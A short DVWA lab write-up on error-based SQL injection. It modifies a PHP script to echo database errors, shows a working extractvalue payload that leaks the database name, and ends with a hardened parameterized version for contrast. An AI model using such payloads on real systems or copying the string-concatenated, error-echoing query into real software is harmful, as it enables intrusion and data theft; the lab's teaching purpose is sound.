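DVWA Blind Injection: Error-Based Injection
The lab is run at the LOW security level.
While attempting error-based injection, we found that newer versions of DVWA do not display the database error output.
Entering 1' only tells us that the parameter is incorrect.
At this point error functions are of no use either; we can only make an exists-or-missing judgement.
However, we found that simply modifying the corresponding script (restoring the `or die` error output on the query) makes the error functions usable and dumps the data successfully.
The modified script is as follows: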
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];
    // Check database
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    //$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        $html .= '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
        // Feedback for end user
        $html .= '<pre>User ID is MISSING from the database.</pre>';
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
After the modification, we can quickly find the injection point:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
Executing an error function then reveals the data:
1' and extractvalue(rand(),concat(0x3e,database()))#
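
The contrast between the modified script above and a hardened lookup, as an added example (not DVWA's code and not from the original post). It assumes PDO with an in-memory SQLite table as a constructed stand-in for DVWA's mysqli/MariaDB connection; the function names `lookup_verbose` and `lookup_hardened` are hypothetical.

```php
<?php
// Constructed in-memory SQLite table standing in for DVWA's MariaDB `users` table (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'admin')");

const EXISTS  = 'User ID exists in the database.';
const MISSING = 'User ID is MISSING from the database.';

// Same pattern as the modified script: input concatenated into the SQL text,
// and the driver's error message echoed back to the client.
function lookup_verbose(PDO $db, string $id): string {
    try {
        $rows = $db->query("SELECT first_name, last_name FROM users WHERE user_id = '$id';")->fetchAll();
    } catch (PDOException $e) {
        return 'DB error shown to client: ' . $e->getMessage();
    }
    return $rows ? EXISTS : MISSING;
}

// Hypothetical hardened form: reject non-numeric ids, bind the value as a
// parameter, and keep database errors in the server log only.
function lookup_hardened(PDO $db, string $id): string {
    if (!ctype_digit($id)) {
        return MISSING;
    }
    try {
        $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1');
        $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
        $stmt->execute();
        $rows = $stmt->fetchAll();
    } catch (PDOException $e) {
        error_log('user lookup failed: ' . $e->getMessage()); // server-side only
        return 'Something went wrong.';
    }
    return $rows ? EXISTS : MISSING;
}

// A valid id and the malformed value from the text above.
foreach (['1', "1'"] as $id) {
    printf("id=%-3s verbose : %s\n", $id, lookup_verbose($db, $id));
    printf("id=%-3s hardened: %s\n", $id, lookup_hardened($db, $id));
}
```

Suppressing the error message alone only returns the page to the exists/missing behaviour described earlier; binding the parameter is what removes the injection point.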